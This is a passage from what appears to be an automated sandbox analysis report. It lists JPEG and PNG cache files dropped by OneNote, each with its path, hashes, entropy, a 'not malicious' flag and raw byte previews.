Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	59707
Entropy (8bit):	7.858445368171059
Encrypted:	false
SSDEEP:	1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
MD5:	47ADB0DF6FDA756920225A099B722322
SHA1:	851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
SHA-256:	EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
SHA-512:	85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........\|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000027.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000029.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
Category:	dropped
Size (bytes):	12654
Entropy (8bit):	7.745439197485533
Encrypted:	false
SSDEEP:	384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
MD5:	4BCCCDBB4273ECEBE216C84930A8D0B2
SHA1:	FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
SHA-256:	474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
SHA-512:	DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+.....4W...lUFh....v..._..wn...dW....y._..v..E~......@wn...dW....y._...v..U..@wn...d..{`;.\|U.2g....3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
Category:	dropped
Size (bytes):	2695
Entropy (8bit):	7.434963358385164
Encrypted:	false
SSDEEP:	48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
MD5:	B23DE98D5B4AFC269ED7EBFDDECE9716
SHA1:	10AF507A8079293A9AE0E3B96CF63A949B4588AA
SHA-256:	646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
SHA-512:	BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..\|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=..f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..\|.Y\|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N\|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y..Ib...VZ+......Y.........'.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
Category:	dropped
Size (bytes):	11040
Entropy (8bit):	7.929583162638891
Encrypted:	false
SSDEEP:	192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
MD5:	02775A1E41CF53AC771D820003903913
SHA1:	2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
SHA-256:	83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
SHA-512:	5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
Malicious:	false
